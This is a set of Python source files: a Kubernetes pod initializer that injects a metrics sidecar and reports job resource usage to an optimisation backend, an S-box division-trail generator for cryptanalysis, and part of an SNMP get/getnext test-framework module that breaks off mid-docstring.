for sn,s in c.get("settings",{}).items():
if sn in ("mem","cpu"): # update resources
path1 = "/spec/containers/{}".format(idx) # this part should exist
path2 = "resources/limits/"
if sn == "mem": path2 += "memory"
else: path2 += "cpu"
patches.append(update1(obj, path1, path2, s["value"]))
# else: FIXME not implemented - other settings
return patches
def check_and_patch(obj, jobid):
"""Test if the monitored object 'obj' has a pending initializer that matches our initializer name.
If it does, patch it. If the object is one of 'ours', we apply all scheduled changes to it.
If it is not, only the pending initializers list is patched.
This should be called for *every* creation or change of an object with the same type as the one
for which our initializer was configured.
"""
if "initializers" not in obj["metadata"]:
# print(" no initializers", file=sys.stderr) # DEBUG
return
pending = obj["metadata"]["initializers"].get("pending",[])
if not pending:
# print(" initializers empty", file=sys.stderr) # DEBUG
return # empty list
if pending[0]["name"] != INITIALIZER_NAME:
# print(" not our turn, current list:", repr(pending), file=sys.stderr) # DEBUG
return # not our
# patch the object - ALWAYS apply this, even if not 'our' pod (the initializer config affects ALL namespaces, so we have to update, otherise pods just won't start)
patch = [{"op": "remove", "path": "/metadata/initializers/pending/0"}]
# if one of 'our' pods, apply other changes that we want
if jobid is not None:
if debug>2: dprint("starting {}".format(obj["metadata"]["name"]))
# inject 'sleeper' process to keep pod active after job exits
# NOTE container name is chosen so it sorts after most 'normal' names,
# not to affect the order of containers in 'containerStatuses' (this works
# with current k8s versions, but may not be future-compatible! Do not
# rely on blind access to containerStatuses[x] - always check the container
# name)
if cfg["sleeper_img"]:
qos = obj["status"]["qosClass"].lower()
uid=obj["metadata"]["uid"]
patch.append({"op":"add",
"path":"/spec/containers/-",
"value" : {
"image": cfg["sleeper_img"] ,
"name": "zzzzmonitor",
"volumeMounts":[{"mountPath":"/rsys", "name":"rsys"}],
"env":[{"name":"OPTUNE_CGROUP_PATH","value":"/kubepods/{qos}/pod{pod}".format(qos=qos,pod=uid)},
{"name":"OPTUNE_SELF_ID", "value":o2id(obj)},
{"name":"REPORT_TARGET", "value":os.environ.get("SELF_IP")}]
#FIXME: get and check self_ip on start, MUST be set
}
})
patch.append({"op":"add", "path":"/spec/volumes/-", "value" : { "name" : "rsys", "hostPath" : {"path":"/sys","type":"Directory"} }})
fake_sleep = False
u = None
while True:
r = send("WHATS_NEXT", jobid, None)
# if not r: error (=None) or no data (={}), assume we got 'measure' (do nothing now, run the job)
if r:
cmd = r["cmd"]
if cmd == "DESCRIBE":
d = query(obj, None) # NOTE no config support for now
d["metrics"] = { "duration": { "unit":"s"}, "est_duration": { "unit":"s"}, "cpu_time" : {"unit":"s"} }
d["metrics"]["perf"] = {"unit":"1/s"} # FIXME - workaround, backend wants something named 'perf'
send("DESCRIPTION", jobid, d) # TODO post to a thread, not to block operation here
continue
elif cmd == "ADJUST":
# prepare updates and add them to the patch
reply = {} # NOTE FIXME: empty data sent, there's a problem with the backend otherwise
try:
u = update(obj, r["param"])
except Exception as x: # TODO: different handling for 'expected' errors vs random Python exceptions
reply = { "status" : "failed", "message":str(x) }
send("ADJUSTMENT", jobid, reply) # expected by the backend
continue
elif cmd == "MEASURE":
break # do nothing, we'll measure at the end. FIXME: no progress reports! (we *could* use the done-at estimate to predict progress and send messages while we wait for the job to run.
elif cmd == "SLEEP": # pretend we did and re-send whats-next, hopefully will not repeat; we can't sleep here
if fake_sleep:
if debug>3: dprint("got 'sleep' twice, ignoring and running pod without changes")
break # did sleep already, move on
if debug>3: dprint("got 'sleep', ignoring")
fake_sleep = True
continue # re-send whats-next
else:
if debug>0: dprint("remote server requested {}, not understood in the current state".format(cmd))
break
else:
# dprint("whats_next req failed, assuming 'measure'")
break
if u: # apply adjustment cmd from server:
patch.extend(u)
patch_str = json_enc(patch)
k_patch_json(obj["metadata"]["namespace"], "pod", obj["metadata"]["name"], patch_str)
def getenv(envarray, key, keyname="name", valname="value"):
"""get a value from a k8s "env" object (array of {"name":x,"value":y}); return None if not found"""
for e in envarray:
if e[keyname] == key:
return e[valname]
return None
def qry(o,q):
"""pick a data item from a nested data structure, based on a filename-like query string
(a simple replacement for tools like jq)"""
try:
for e in q.split("/"):
if not e: continue # skip empty (e.g., leading or duplicate "/")
if e[0] == "[": # special query [q,k,v]: find "k"==q in array of {"k":x,"v":y} items
a = e[1:-1].split(",")
if len(a) == 1: a += ["name","value"]
k,kn,vn = a
# assert a is list
o = getenv(o, k, kn, vn)
elif isinstance(o,dict):
o = o[e]
elif isinstance(o,list):
o = o[int(e)]
else:
# print(e, type(o), o)
raise ValueError
return o
except Exception:
return None
def get_jobid(obj):
"""check if the k8s object is one of those we care about and return the configured JOBID
env variable value if so, otherwise return None. The expected object type is 'pod' here,
but this might change.
"""
if obj["metadata"]["namespace"] not in cfg["namespaces"]:
return None
return qry(obj, cfg["appid"])
iso_z_fmt = "%Y-%m-%dT%H:%M:%SZ"
def get_cstatus(pod, c):
if isinstance(c, int): # if index given, find the name
c = pod["spec"]["containers"][c]["name"]
for s in pod["status"]["containerStatuses"]:
if s["name"] == c:
return s
return None # not found
def report(jobid, obj, m):
"""send a 'measure' event for a job completion"""
# d = either data from measure() or {status:failed, message:"..."}
d = { "metrics" : m }
d["annotations"] = {
"resources": json_enc(obj["spec"]["containers"][0].get("resources",{})),
"exitcode" : get_cstatus(obj,0)["state"]["terminated"]["exitCode"] }
send("MEASUREMENT", jobid, d)
def send(event, app_id, d):
post = {"event":event, "param" : d}
if debug>1: dprint("POST", json_enc(post))
# time curl -X POST -H 'Content-type: application/json' -H 'Authorization: Bearer <token>' https://us-central1-optune-saas-collect.cloudfunctions.net/metrics/app1/servo -d @/tmp/payload
r = None
args = {}
if cfg["auth_token"]:
args["headers"] = {"Authorization": "Bearer " + cfg["auth_token"] }
try:
url = cfg["url_pattern"].format(app_id=app_id, acct=cfg["account"])
for retry in (2,1,1):
r = requests.post(url,json=post,timeout=cfg["send_timeout"], **args)
if r.ok: break
if r.status_code != 502 and r.status_code != 503:
break
if debug>3: dprint("rq fail 50x, retry {}".format(retry))
time.sleep(retry) # FIXME: workaround for problem in back-end
if not r.ok: # http errors don't raise exception
if debug>0: dprint("{} {} for url '{}', h={}".format(r.status_code, r.reason, r.url, repr(r.request.headers)))
except Exception as x: # connection errors - note these aren't retried for now
if debug>0: dprint( "POST FAILED: " + str(x) )
if not r:
return None # error
try:
return r.json()
except Exception as x: # no json data
if debug>0: dprint( "JSON PARSE FAILED: " + str(x) + "\n INPUT:" + r.text )
return {}
# track pods that we see entering "terminated" state (used to avoid sending a report more than once); entries are cleared from this map on a DELETED event
g_pods = {}
def report_worker():
while True:
obj = report_queue.get()
report_task(obj)
report_queue.task_done()
# start threads to wait on the queue
g_threads = []
report_queue = queue.Queue()
for t in range(4):
th = threading.Thread(target = report_worker)
th.daemon = True # allow program to exit with the thread still running
th.start()
g_threads.append(th)
def report_task(obj):
"""asynch task called to prepare and send a MEASURE report, this is called
from worker threads to prevent blocking the main loop, because the task
has to: (a) wait enough time to collect the cgroup stats and (b) send
the data over the network.
"""
jobid = get_jobid(obj)
c0state = get_cstatus(obj, 0)["state"]
cc = calendar.timegm(time.strptime(obj["metadata"]["creationTimestamp"], iso_z_fmt))
t = c0state["terminated"]
cs = t["startedAt"]
ce = t["finishedAt"]
if cs is None or ce is None: # terminated, but did not run
send("MEASUREMENT", jobid, {"status":"failed", "message":"job deleted before it ran"})
return
cs = calendar.timegm(time.strptime(cs, iso_z_fmt))
ce = calendar.timegm(time.strptime(ce, iso_z_fmt))
m = { "duration": {"value":ce - cs, "unit":"s"} }
m["perf"] = {"value":1/float(m["duration"]["value"]), "unit":"1/s"} # FIXME - remove when backend stops requiring this
pid = o2id(obj)
rec = g_pods[pid] # shouldn't fail
c = rec["cond"]
with c:
_stats = c.wait_for(lambda: rec.get("_stats"), timeout = 30)
if _stats: # we got a report via the API, add it to the results
cpu_ns = _stats["cpu_time"]
max_usage = _stats["max_usage"] #units?? TBD
m["cpu_time"] = {"value":cpu_ns/1e9, "unit":"s"}
m["max_memory"] = {"value":max_usage, "unit":"bytes"}
else:
if debug>0: dprint("failed to get cgroup pod stats")
try: # "done-at" isn't mandatory
eta = int(obj["metadata"]["annotations"]["done-at"])
m["est_duration"] = {"value":eta - cc, "unit":"s"}
except (KeyError,ValueError):
pass
report(jobid, obj, m)
def watch1(c):
obj = c["object"]
if c["type"] == "ERROR":
return None # likely 'version too old' - trigger restart
# {"type":"ERROR","object":{"kind":"Status","apiVersion":"v1","metadata":{},"status":"Failure","message":"too old resource version: 1 (3473)","reason":"Gone","code":410}}
v = obj["metadata"]["resourceVersion"]
if obj["kind"] != "Pod":
# warn, shouldnt happen
return v
jobid = get_jobid(obj)
if debug>1: dprint("watched obj {}: {}".format(c["type"], obj["metadata"]["name"]))
if c["type"] == "DELETED" and jobid is not None:
g_pods.pop(o2id(obj))
if not c["type"] in ("ADDED", "MODIFIED"):
return v # ignore delete and other changes
check_and_patch(obj, jobid)
# track job completion
if jobid is not None:
pid = o2id(obj)
if pid not in g_pods and "containerStatuses" in obj["status"]:
c0state = get_cstatus(obj, 0)["state"]
if "terminated" in c0state:
job_completed(obj)
#g_pods[pid] = True
#report_queue.put(obj) # send it off to a thread to wait for pod stats and send a report
return v
# global var storing the external 'kubectl' process obj, used to terminate it when
# we get INTR or TERM singal.
# TODO: temporary, not useable if we run more than one background process
g_p = None
def run_watch(v, p_line):
api = "/api/v1" # FIXME (ok with current k8s, but switch to api groups later)
qry = "pods?includeUninitialized=true&watch=1&resourceVersion="+str(v)
tgt = "/".join( (api, qry) )
cmd = ["kubectl", "get","--request-timeout=0", "--raw", tgt ]
stderr = [] # collect all stderr here FIXME: maybe don't collect stderr?
stdin = b'' # no stdin
proc = subprocess.Popen(cmd, bufsize=0, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
g_p = proc
wi = [proc.stdin]
ei = [proc.stdin, proc.stdout,proc.stderr]
eof_stdout = False
eof_stderr = False #
while True:
r,w,e = select.select([proc.stdout,proc.stderr], wi, ei )
if eof_stdout and eof_stderr and proc.poll() is not None: # process exited and no more data
break
for h in r:
if h is proc.stderr:
l = h.read(4096) # noqa: E741 (l as in line)
if not l:
eof_stderr = True
continue
stderr.append(l)
else: # h is proc.stdout
l = h.readline() # noqa: E741 (l as in line)
if not l:
eof_stdout = True
continue
stdout_line = l.strip().decode("UTF-8") # there will always be a complete line, driver writes one line at a time
if debug>4: dprint('STDOUT:', stdout_line) # DEBUG FIXME
if not stdout_line:
continue # ignore blank lines (shouldn't be output, though)
try:
stdout = json.loads(stdout_line)
except Exception as x:
proc.terminate()
# TODO: handle exception in json.loads?
raise
v = p_line(stdout)
if v is None: return 1, v # failure - return to trigger a new 'get' of all pods
if w:
# write with select.PIPE_BUF bytes or less should not block
l = min(getattr(select,'PIPE_BUF',512), len(stdin)) # noqa: E741 (l as in line)
if not l: # done sending stdin
proc.stdin.close()
wi = []
ei = [proc.stdout,proc.stderr]
else:
proc.stdin.write(stdin[:l])
stdin = stdin[l:]
# if e:
rc = proc.returncode
g_p = None
if rc == 1 and len(stderr) == 1 and "unexpected EOF" in stderr[0]:
return 0, v # this is OK, it times out after 5 minutes
if debug>0: dprint("kubectl exited, code=", rc) # DEBUG
if debug>1:
stderr = "".join(stderr)
dprint(stderr)
send("DIAG", "_global_", {"account":cfg["account"], "reason":"kubectl watch", "stderr": stderr[:2000]})
return rc, v
def watch():
pods = k_get_raw("", "pods?includeUninitialized=true")
for p in pods.get("items", []): # should exist?
jobid = get_jobid(p)
if jobid is None:
if debug>3: dprint("existing other obj: {}".format(p["metadata"]["name"])) # DEBUG
else:
if debug>3: dprint("existing job obj: {}".format(p["metadata"]["name"])) # DEBUG
check_and_patch(p, jobid)
v = pods["metadata"]["resourceVersion"]
if debug>3: print("INFO: watch",v)
while True:
r, v = run_watch(v, watch1)
if r:
return # exit (we'll be restarted from scratch - safer than re-running watch, in case of an error)
if debug>3: dprint ("INFO: resubmit watch", v)
def intr(sig_num, frame):
# if we want to kill(0,sig) from the handler:
signal.signal(sig_num, signal.SIG_DFL)
if g_p:
g_p.terminate()
send("GOODBYE", "_global_", {"account":cfg["account"], "reason":"signal {}".format(sig_num)})
if http_server:
http_server.shutdown()
# http_server.close() # ? needed
os.kill(0, sig_num) # note this loses the frame where the original signal was caught
# or sys.exit(0)
# ===
# bits from servo-k8s
def numval(v,min,max,step=1):
"""shortcut for creating linear setting descriptions"""
return {"value":v,"min":min,"max":max, "step":step, "type": "range"}
def cpuunits(s):
'''convert a string for CPU resource (with optional unit suffix) into a number'''
if s[-1] == "m": # there are no units other than 'm' (millicpu)
return ( float(s[:-1])/1000.0 )
else:
return (float(s))
# valid mem units: E, P, T, G, M, K, Ei, Pi, Ti, Gi, Mi, Ki
mumap = {"E":1000**6, "P":1000**5, "T":1000**4, "G":1000**3, "M":1000**2, "K":1000,
"Ei":1024**6, "Pi":1024**5, "Ti":1024**4, "Gi":1024**3, "Mi":1024**2, "Ki":1024}
def memunits(s):
'''convert a string for memory resource (with optional unit suffix) into a number'''
for u,m in mumap.items():
if s.endswith(u):
return ( float(s[:-len(u)]) * m )
return (float(s))
def query(obj,desc=None):
"""create a response to 'describe' cmd from k8s pod desc and optional custom properties desc """
# this is a simplified version compared to what the k8s servo has (single container only); if we change it to multiple containers, they will be the app's components (here the app is a single pod, unlike servo-k8s where 'app = k8s deployment'
if not desc:
desc = {"application":{}}
elif not desc.get("application"):
desc["application"] = {}
comps = desc["application"].setdefault("components", {})
c = obj["spec"]["containers"][0]
cn = c["name"]
comp=comps.setdefault(cn, {})
settings = comp.setdefault("settings", {})
r = c.get("resources")
if r:
settings["mem"] = numval(memunits(r.get("limits",{}).get("memory","0")), 0, MAX_MEM, MEM_STEP) # (value,min,max,step)
settings["cpu"] = numval(cpuunits(r.get("limits",{}).get("cpu","0")), 0, MAX_CPU, CPU_STEP) # (value,min,max,step)
for ev in c.get("env",[]):
# skip env vars that match the pre-defined setting names above
if ev["name"] in ("mem","cpu","replicas"):
continue
if ev["name"] in settings:
s = settings[ev["name"]]
if s.get("type", "linear") == "linear":
try:
s["value"] = float(ev["value"])
except ValueError:
raise ConfigError("invalid value found in environment {}={}, it was expected to be numeric".format(ev["name"],ev["value"]))
else:
s["value"] = ev["value"]
return desc
def o2id(obj):
# FIXME: encode self ID (for now, just the pod UID)
return obj["metadata"]["uid"]
def job_completed(obj):
#
pid = o2id(obj)
c = threading.Condition()
g_pods[pid] = { "cond" : c }
# TODO: consider saving pid in obj[_pid], in case o2id() is slow
report_queue.put(obj) # send it off to a thread to wait for pod stats and send a report
# with c:
# c.notify()
def handle_cgroup_stats(data):
# dprint("got post with stats", repr(data))
pid = data.get("id", None)
if not pid:
# invalid input if no 'id', ignore it silently
# dprint("no ID", pid)
return
r = g_pods.get(pid, None)
if not r:
# dprint("no match for", pid)
# error, we do not expect report before g_pods is updated
return
c = r["cond"]
with c:
r["_stats"] = data["stats"]
c.notify()
# === server for receiving stats from sidecar container
http_server = None
http_thread = None
class Handler(http.server.BaseHTTPRequestHandler):
"""this handler answers to POST on any URL, only the input data is used. Data
should be in JSON format and contain { "id":string, "stats":{stats} }"""
def do_POST(self):
cl = self.headers.get("Content-length","") # should be present - or else
try:
cl = int(cl) # will fail if the header is empty
except ValueError:
self.send_error(400, message="bad request",explain="content-length is missing or invalid")
return
data = self.rfile.read()
try:
data = json.loads(data)
except Exception as x:
self.send_error(400, message="bad request", explain="could not parse input as JSON data: "+str(x))
handle_cgroup_stats(data)
self.send_error(204) # instead of 200, no body needed
# self.end_headers() - called by send_error()
def log_request(self, code='-', size='-'):
pass # do nothing
def log_error(self, format, *args):
pass
def version_string(self):
return "OptuneStatsPost/1.0"
class TServer(socketserver.ThreadingMixIn, http.server.HTTPServer):
pass
def run_server():
s = TServer(('',8080),Handler)
s.daemon_threads = True
thread = threading.Thread(target=s.serve_forever)
http_server = s
http_thread = thread
thread.start()
return s, thread
# ===
if __name__ == "__main__":
signal.signal(signal.SIGTERM, intr)
signal.signal(signal.SIGINT, intr)
run_server()
# dprint(repr(cfg)) #DEBUG
send("HELLO", "_global_",{"account":cfg["account"]}) # NOTE: (here and in other msgs) acct not really needed, it is part of the URL, to be removed
try:
watch()
send("GOODBYE", "_global_", {"account":cfg["account"], "reason":"exit" }) # happens if we missed too many events and need to re-read the pods list; TODO: handle this internally without exiting
except Exception as x:
import traceback #DEBUG
traceback.print_exc() #DEBUG
send("GOODBYE", "_global_", {"account":cfg["account"], "reason":str(x) })
# TODO send pod uuid (catch duplicates)
|
GenInt.py
|
from .Polynomial import *
from .Sbox import *
from .Term import *
from .Vector import *
from multiprocessing import Process, Lock
from threading import Thread
#from pudb import set_trace; set_trace()
class GenInt(object):
def __init__(self, values, inputLength, outputLength ):
self.probability_bit = 0
self.mutex = Lock()
self.trails = dict()
self.inputLength = inputLength
self.outputLength = outputLength
self.sbox = Sbox(values, inputLength, outputLength)
self.possible_pattern = []
self.impossible_pattern = []
self.__genPatterns()
def getTrails(self):
if not self.trails:
self.__genSboxTrails()
return self.trails
def __genImp_from_pos(self, possibleList):
full_list = [ Vector( self.outputLength, x) for x in range(1 << self.outputLength)]
return list( set(full_list) - set(possibleList) )
def __genPatterns(self):
if not self.trails:
self.__genSboxTrails()
for vec_in in self.trails: # vec_in is a Vector
impossibleList = self.__genImp_from_pos( self.trails[vec_in] )
for vec_out in self.trails[vec_in]:
self.possible_pattern.append( ( vec_in + vec_out ).toList() )
for vec_out in impossibleList:
self.impossible_pattern.append( ( vec_in + vec_out ).toList() )
def __genSboxTrails(self):
polys = self.sbox.getPolynomilas()
(in_dim, out_dim) = self.sbox.getDimension()
poly_to_check = []
for outVec in range(0, 1 << in_dim ):
poly_to_check.append( self.__multiply_by_vec( polys, outVec, Polynomial('1', in_dim) ) )
self.trails[ Vector(out_dim, 0 ) ] = [ Vector(out_dim, 0) ]
threads = []
for inputVec in range(1, 1 << in_dim):
threads.append( Thread( target = self.__genSet_from_inputVec, args = (inputVec, poly_to_check, in_dim, out_dim, polys ) ) )
for thread in threads:
thread.start()
for thread in threads:
thread.join()
def __genSet_from_inputVec( self, inputVec, poly_to_check, in_dim, out_dim, polys ):
outUnknown = []
vec = Vector( in_dim, inputVec )
in_vectorSet = vec.getCoveringVectors()
for outVec in range(1, 1 << out_dim):
# This step process in every loop and it is the berg, I can preproduce these polynomials
if poly_to_check[outVec].containTermSet(in_vectorSet, in_dim):
outUnknown.append( Vector( out_dim, outVec ) )
outUnknown = self.__deleteRedundancy( outUnknown )
outUnknown.sort()
self.mutex.acquire()
self.trails[vec] = outUnknown
self.mutex.release()
def __deleteRedundancy(self, vectors):
assert isinstance(vectors, list)
for v in vectors:
set_sub = v.getCoveringVectors()
set_sub.remove( v )
if set_sub:
vectors = set(vectors) - set( set_sub )
return list(vectors)
def __multiply_by_vec(self, beControledList, conVec, e ):
dim = len(beControledList)
assert 0 <= conVec < (1 << dim)
res = e
for i in range(dim):
if conVec >> (dim - 1 - i) & 1:
res *= beControledList[i]
return res
def main():
#sbox = [0x63, 0x7c, 0x77, 0x7b, 0xf2, 0x6b, 0x6f, 0xc5, 0x30, 0x01, 0x67, 0x2b, 0xfe, 0xd7, 0xab, 0x76,0xca, 0x82, 0xc9, 0x7d, 0xfa, 0x59, 0x47, 0xf0, 0xad, 0xd4, 0xa2, 0xaf, 0x9c, 0xa4, 0x72, 0xc0, 0xb7, 0xfd, 0x93, 0x26, 0x36, 0x3f, 0xf7, 0xcc, 0x34, 0xa5, 0xe5, 0xf1, 0x71, 0xd8, 0x31, 0x15, 0x04, 0xc7, 0x23, 0xc3, 0x18, 0x96, 0x05, 0x9a, 0x07, 0x12, 0x80, 0xe2, 0xeb, 0x27, 0xb2, 0x75, 0x09, 0x83, 0x2c, 0x1a, 0x1b, 0x6e, 0x5a, 0xa0, 0x52, 0x3b, 0xd6, 0xb3, 0x29, 0xe3, 0x2f, 0x84, 0x53, 0xd1, 0x00, 0xed, 0x20, 0xfc, 0xb1, 0x5b, 0x6a, 0xcb, 0xbe, 0x39, 0x4a, 0x4c, 0x58, 0xcf, 0xd0, 0xef, 0xaa, 0xfb, 0x43, 0x4d, 0x33, 0x85, 0x45, 0xf9, 0x02, 0x7f, 0x50, 0x3c, 0x9f, 0xa8, 0x51, 0xa3, 0x40, 0x8f, 0x92, 0x9d, 0x38, 0xf5, 0xbc, 0xb6, 0xda, 0x21, 0x10, 0xff, 0xf3, 0xd2,0xcd, 0x0c, 0x13, 0xec, 0x5f, 0x97, 0x44, 0x17, 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73, 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88, 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb, 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c, 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79, 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9, 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08, 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6, 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a, 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e, 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e, 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94, 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf, 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68, 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16 ]
sbox = [ 12, 5, 6, 11 , 9, 0, 10, 13, 3, 14, 15, 8, 4, 7, 1, 2 ]
#
#sbox = [ 0x6, 0x5, 0xC, 0xA, 0x1, 0xE, 0x7, 0x9, 0xB, 0x0, 0x3, 0xD, 0x8, 0xF, 0x4, 0x2 ]
genInt = GenInt(sbox, 4, 4)
for x in genInt.possible_pattern:
print (x)
for x in genInt.impossible_pattern:
print (x)
print( len(genInt.possible_pattern ) )
print( len(genInt.impossible_pattern ) )
#for x in t:
# print ( str(x), [str(i) for i in t[x] ] )
if __name__ == '__main__':
main()
|
common_snmp_actions.py
|
'''
Copyright 2017, Fujitsu Network Communications, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
'''
"""
Implementation of the standard SNMP protocol commands for SNMP v1 and v2c and V3
and IPv6 support added.
SNMP v3 Trap and Inform support added.
"""
import re
import ast
import Framework.Utils as Utils
from Framework.ClassUtils.snmp_utlity_class import WSnmp as ws
from Framework.Utils import testcase_Utils, config_Utils, data_Utils, snmp_utils
from threading import Thread
from time import sleep
import socket
import Queue
try:
from pysnmp.entity.rfc3413 import ntfrcv
from pysnmp.smi import builder, view, compiler, rfc1902, error
except ImportError:
testcase_Utils.pNote("Please Install PYSNMP 4.3.8 or Above", "error")
class CommonSnmpActions(object):
"""
Class for standard SNMP protocol commands
"""
def __init__(self):
"""
This is intialization
"""
self.resultfile = Utils.config_Utils.resultfile
self.datafile = Utils.config_Utils.datafile
self.logsdir = Utils.config_Utils.logsdir
self.filename = Utils.config_Utils.filename
self.logfile = Utils.config_Utils.logfile
self.snmpver = {'1':'0', '2':'1', '2c':'1', '3':'2'}
def snmp_get(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None,
custom_mib_paths=None,
load_mib_modules=None):
"""
snmp_get uses the SNMP GET request to query for information on a
network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7.system_name(string) = Name of the system from the input datafile
8.snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
#arguments 9-13 are only for SNMPv3 or mpModel = 2 and in that
# case communityname will be None
9.userName(string) = A human readable string representing the
name of the SNMP USM user.
e.g. 'usr1'
10.authKey(string) = Initial value of the secret authentication key.
e.g. 'authkey1'
11.privKey(string) = Initial value of the secret encryption key.
e.g. 'privkey1'
12.authProtocol(string) = An indication of whether messages sent on behalf of
this USM user can be authenticated, and if so, the type of
authentication protocol which is used.
supported protocols: usmNoAuthProtocol,
usmHMACMD5AuthProtocol, usmHMACSHAAuthProtocol
authProtocol="1,3,6,1,6,3,10,1,1,2"
13.privProtocol(string) = An indication of whether messages sent on behalf
of this USM user be encrypted, and if so,
the type of encryption protocol which is used.
supported usmNoPrivProtocol(default),
usmDESPrivProtocol, usm3DESEDEPrivProtocol, usmAesCfb128Protocol
e.g. privProtocol="1,3,6,1,6,3,10,1,2,2"
14.custom_mib_paths: User can provide multiple MIB source path seperated by comma (',')
Source path can be url or just absolute directory path. Refer bellow example.
e.g. 'http://<URL>/@mib@, /data/users/MIBS/'.
For URL it supports http, file, https, ftp and sftp.
Use @mib@ placeholder token in URL location to refer.
15.load_mib_modules: User can provide the MIBS(name) need to be loaded
from the path "custom_mib_path".
It is a string of MIB names separated by comma(',')
:Return:
status(bool)= True / False.
output_dict = consists of following key value:
1.errindication: If this string is not empty, it indicates the SNMP
engine error.
2.errstatus: If this element evaluates to True, it indicates an
error in the SNMP communication.Object that generated
the error is indicated by the errindex element.
3.errindex: If the errstatus indicates that an error has occurred,
this field can be used to find the SNMP object that
caused the error. The object position in the result
array is errindex-1.
4.result: This element contains a list of all returned SNMP object
elements. Each element is a tuple that contains the name
of the object and the object value.
"""
wdesc = "Executing SNMP GET command"
Utils.testcase_Utils.pSubStep(wdesc)
status = False
snmp_parameters = ['ip', 'snmp_port']
snmp_param_dic = Utils.data_Utils.get_credentials(self.datafile,
system_name,
snmp_parameters)
ipaddr = snmp_param_dic.get('ip')
port = snmp_param_dic.get('snmp_port')
output_dict = {}
temp_custom_mib_paths = None
wsnmp = ws(communityname, self.snmpver.get(snmp_ver), ipaddr, port, snmp_timeout,
userName, authKey, privKey, authProtocol,
privProtocol)
cmdgen = wsnmp.commandgenerator()
if self.snmpver.get(snmp_ver) is '2':# for ssnmp v3
auth_data = wsnmp.usmuserdata()
else: #for snmp v1 or v2c
auth_data = wsnmp.communitydata()
if ':' in ipaddr:#for ipv6
transport = wsnmp.udp6transporttarget()
else: #for ipv4
transport = wsnmp.udptransporttarget()
if custom_mib_paths:
temp_custom_mib_paths = snmp_utils.split_mib_path(custom_mib_paths)
if oid_string == None and mib_name == None:
testcase_Utils.pNote("Please provide OID or MIB Information!", "error")
if oid_string:
oid = tuple([int(e) if e.isdigit() else e for e in oid_string.split('.')])
else:
if custom_mib_paths:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value).\
addAsn1MibSource(*temp_custom_mib_paths)
else:
oid = wsnmp.mibvariable(mib_name, mib_index, mib_value)
try:
errindication, errstatus,\
errindex, result = cmdgen.getCmd(auth_data, transport, oid)
output_dict = {
'{0}_errindication'.format(system_name):errindication,
'{0}_errstatus'.format(system_name):errstatus,
'{0}_errindex'.format(system_name):errindex,
'{0}_result'.format(system_name):result,
'{0}_custom_mib_paths'.format(system_name):temp_custom_mib_paths,
'{0}_load_mib_modules'.format(system_name):load_mib_modules
}
if result != []:
status = True
testcase_Utils.pNote("Successfully executed SNMP GET command {}"
.format(result), "info")
else:
testcase_Utils.pNote("Failure SNMP Command Return Null Value! {}"
.format(result), "error")
except wsnmp.exception as excep:
status = False
testcase_Utils.pNote("SNMP GET command Failed!\n{}".format(excep), "error")
Utils.testcase_Utils.report_substep_status(status)
return status, output_dict
def snmp_getnext(self, snmp_ver, system_name, mib_name=None,
mib_index=None, mib_value=None,
oid_string=None, communityname=None,
snmp_timeout=60, max_rows=1,
userName=None, authKey=None, privKey=None, authProtocol=None,
privProtocol=None, custom_mib_paths=None, load_mib_modules=None):
"""
snmp_get_next uses the SNMP GETNEXT request to query for information
on a network entity
:Datafile usage:
1.(string) Agents IP address. address="192.168.1.68"
2.(string) SNMP UDP port. port="161"
:Arguments:
1.communityname : SNMP v1/v2c community string. e.g. 'public'
2. snmp_ver: Support for v1 and V2 and V3 1 for v1, 2 for V2, 3 for V3
3.mib_name : Name of the Management Information Base e.g. 'IF-MIB'
4.mib_index: MIB index name e.g. 'ipAdEntAddr'
5.mib_value: e.g. '127.0.0.1'
6.oid_string: object identifiers (OIDs) that are available on the
managed device.
e.g. '1.3.6.1.2.1.2.2.1.6' which is, ifPhysAddress
The physical address of the interface.
User can provide either MIB or oid_string.
7. system_name(string) = Name of the system from the input datafile
8. snmp_timeout: Number of seconds the SNMP manager will wait for a
responce from SNMP Agent. In case of SNMP walk the may need to
set to higher.
9.max_rows = By default its value is one if user wants to change the
no of get next message from the given OID or MIB value they can change it with
